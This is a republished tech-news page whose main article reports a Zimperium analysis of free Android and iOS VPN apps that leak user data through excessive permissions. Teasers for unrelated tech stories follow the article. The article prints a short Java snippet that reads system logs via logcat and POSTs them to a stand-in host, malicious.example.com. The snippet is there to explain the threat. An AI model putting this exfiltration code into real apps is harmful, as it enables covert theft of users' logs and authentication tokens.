κατασκευή ιστοσελίδων ρόδος

TECH - WEB DEVELOPMENT NEWS

Get the latest tech - web development news and analysis on industry around the world.

  • HOME
You are here: Home / INDUSTRY NEWS / Hundreds of Free VPN Apps for Both Android and iOS Leaks Users Personal Data
άμυνα
.

Hundreds of Free VPN Apps for Both Android and iOS Leaks Users Personal Data

03/10/2025

Mobile VPN apps promise to protect privacy and secure communications on smartphones, but a comprehensive analysis of nearly 800 free Android and iOS VPN applications reveals a troubling reality: many of these tools expose sensitive information rather than shield it.

From insecure configurations to dangerous permissions and outdated libraries, the apps that millions trust are often the weakest link in both personal and enterprise security.

The implications of widespread data leakage extend well beyond individual privacy—corporate networks, BYOD policies, and high-value targets all stand to suffer from unexpected exposures.

Emerging over the past year, this trend exploits users’ desire for cost-free encryption and unrestricted browsing.

Attackers hiding within otherwise legitimate VPN interfaces can intercept credentials, harvest device identifiers, and even record ambient audio.

Zimperium analysts noted the discovery of dozens of apps that transmitted unencrypted user metadata to remote servers, bypassing any semblance of secure tunnel encryption.

These findings underscore how easily threat actors can exploit the trust placed in free VPN services.

Initial infection vectors vary by platform. On Android, several VPN packages are repackaged with malicious modules that trigger stealth network requests upon app launch.

On iOS, misconfigured privacy manifests and over-permissive entitlements allow apps to silently collect and exfiltrate location, usage logs, and crash reports. In both ecosystems, a combination of missing certificate validation and exposed APIs creates fertile ground for man-in-the-middle and data-harvesting attacks.

Many victims remain unaware until unusual network traffic patterns or unexplained account lockouts emerge. Corporate defenders often dismiss free VPNs as harmless productivity tools, inadvertently granting them carte blanche within corporate firewalls.

By the time logs reveal outbound requests to dubious domains—complete with personal identifiers—the breach is already well underway.

Permission Abuse and Data Exfiltration

A critical mechanism enabling these leaks is the abuse of dangerous permissions that far exceed a VPN’s legitimate scope.

For instance, on Android, the READ_LOGS permission lets an app read all system logs—including fragments of user input and authentication tokens—and forward them to an attacker’s server.

A sample Java snippet below illustrates how easily a malicious module captures logs and delivers them via HTTP:-

Process process = Runtime.getRuntime().exec(“logcat -d”);
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(process.getInputStream()));
StringBuilder log = new StringBuilder();
String line;
while ((line = bufferedReader.readLine()) != null) {
log.append(line).append(“n”);
}
HttpURLConnection conn = (HttpURLConnection) new URL(“https://malicious.example.com/collect”).openConnection();
conn.setRequestMethod(“POST”);
conn.setDoOutput(true);
conn.getOutputStream().write(log.toString().getBytes(StandardCharsets.UTF_8));
conn.getInputStream();

This covert channel bypasses standard VPN encryption and sidesteps user awareness. On iOS, private entitlements such as LOCATION_ALWAYS grant constant GPS access, allowing apps to fuse real-time movement with browsing data.

Potential security and privacy issues (Source – Zimperium)

This depicts the prevalence of excessive permissions among analyzed VPN apps. By exploiting permission overreach, these free VPN apps transform trusted privacy tools into surveillance platforms.

Users and organizations must scrutinize permissions and vet VPN providers rigorously, favoring solutions with transparent security practices and regular code maintenance.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

Source: cybersecuritynews.com

Filed Under: INDUSTRY NEWS Tagged With: Source-10

5 ways mice can easily become more user-repairable

We use peripherals like keyboards and mice nearly every minute our PCs are awake, yet they seem to draw the short straw in terms of innovation. We’ve had a solid run with mechanical keyboards, where a vibrant community has pushed the industry from soldered, inaccessible boards to hot-swappable, endlessly customizable typing instruments. We’ve seen PC cases evolve with modularity and ease-of-access … [Read More...]

Anker's latest Prime charging devices are already 20 percent off

Anker's latest Prime charging devices are already on sale thanks to some handy coupons. The best deals include the laptop-compatible Prime Power Bank (26,250mAh, 300W), which is 20 percent off and down to $184 when you clip the on-page coupon on its Amazon page.This portable charger delivers a whopping 300W of total output between its two USB-C ports and single USB-A port. Anker says that, thanks … [Read More...]

This free browser extension was a game changer for my Dungeons & Dragons group

I love playing tabletop roleplaying games (TTRPGs), but virtual games just aren’t the same for me, especially when it comes to dice. There’s just something so satisfying about watching your d20 clatter around on the table (before probably landing on a nat one) that you usually miss out on with digital dice rolls in virtual games. Source: xda-developers.com … [Read More...]

If you can get past the terrible logo, Audacity 4 looks pretty great

Over 25 years it’s gone from a clean and simple audio editor, to a UX nightmare. Version 4 aims to fix that.Oct 5, 2025, 5:37 PM UTCTerrence O'Brien is the Verge’s weekend editor. He has over 18 years of experience, including 10 years as managing editor at Engadget.Rebrands rarely get much love. That backlash can be especially strong if you’re giving a facelift to a decades-old piece of software … [Read More...]

Uber and Lyft drivers in California are able to unionize under new law

California governor Gavin Newsom signed legislation on Friday that grants rideshare drivers in the state the right to unionize. It's the second state to grant organizing rights to rideshare drivers, who are independent contractors, following the passage of a similar law in Massachusetts in 2024. There are over 800,000 rideshare drivers in California, and the bill that was just signed into law … [Read More...]

This Roomba robot vacuum is on sale for $150 for Prime Day

Robot vacuums are great items to look for during events like October Prime Day. They're usually hundreds of dollars off, so you can save a ton if you're buying one as a gift or you want to upgrade an aging robovac you have at home already. One of the best deals this time around is on the iRobot Roomba 104, which is 40 percent off and on sale for only $150.This is a newer version of the unit that … [Read More...]

Marvel's Wolverine needed to feel different than Insomniac's Spider-Man games

Fans have been wanting to see anything from Insomniac Games' upcoming Wolverine for PlayStation 5. Following the massive leak for the company that revealed most of the planned game releases and concepts for their titles, many fans were wondering if they would have to wait longer before catching an official glimpse at what was coming next. But during the State of Play showcase for PlayStation in … [Read More...]

ICE is planning to create a surveillance team that hunts for leads on social media

The US Immigration and Customs Enforcement (ICE) has plans to build out a 24/7/365 surveillance team that focuses on scouring social media for case leads, as revealed in documents first discovered by Wired. According to public records, ICE has put out a request for information — which allows the agency to detail its preliminary scope of work to gauge any interest from contractors — that details … [Read More...]

OpenAI and Jony Ive may be struggling to figure out their AI device

OpenAI and Jony Ive face significant technical challenges as they work to develop a screen-less, AI-powered device, according to the Financial Times. Back in May, OpenAI acquired io, the device startup founded by the legendary Apple designer with OpenAI CEO Sam Altman, for $6.5 billion. At the time, Altman declared that Ive and his team would help the company “create a new generation of … [Read More...]

An old Xeon may use a lot of power, but it's not as slow as you might think

Contrary to what you may believe, home labs don’t require a lot of monetary investment. Depending on your requirements, you can put together a reliable containerization server using budget-friendly SBCs. Heck, if you’ve got a spare PC gathering dust, you can even arm it with a virtualization platform and turn it into a powerful home server. Source: xda-developers.com … [Read More...]

Tags

Source-1 Source-2 Source-3 Source-4 Source-5 Source-6 Source-7 Source-8 Source-9 Source-10 Source-12 Source-13 Source-15 Source-16

Tech Web Development News

This is a PERSONAL and PRIVATE WEBPAGE. Please leave this page. Contact me via email : admin@news-6.com about anything you would like to ask or problem.

Tech News

Disclaimer!
In every post is written below the original source of the post. Copyrights belong on their owners.

Web Development News

HOTELS – CRUISES – CARS – TRAVEL

Recent Posts

  • 5 ways mice can easily become more user-repairable
  • Anker's latest Prime charging devices are already 20 percent off
  • This free browser extension was a game changer for my Dungeons & Dragons group
  • If you can get past the terrible logo, Audacity 4 looks pretty great
  • Uber and Lyft drivers in California are able to unionize under new law

Technology - Seo

Categories

  • INDUSTRY NEWS

World Industry News

Privacy & Cookies: This site uses cookies.
To find out more, as well as how to remove or block these, see here: Our Cookie Policy
TECH - WEB DEVELOPMENT NEWS @ COPYRIGHTS 2023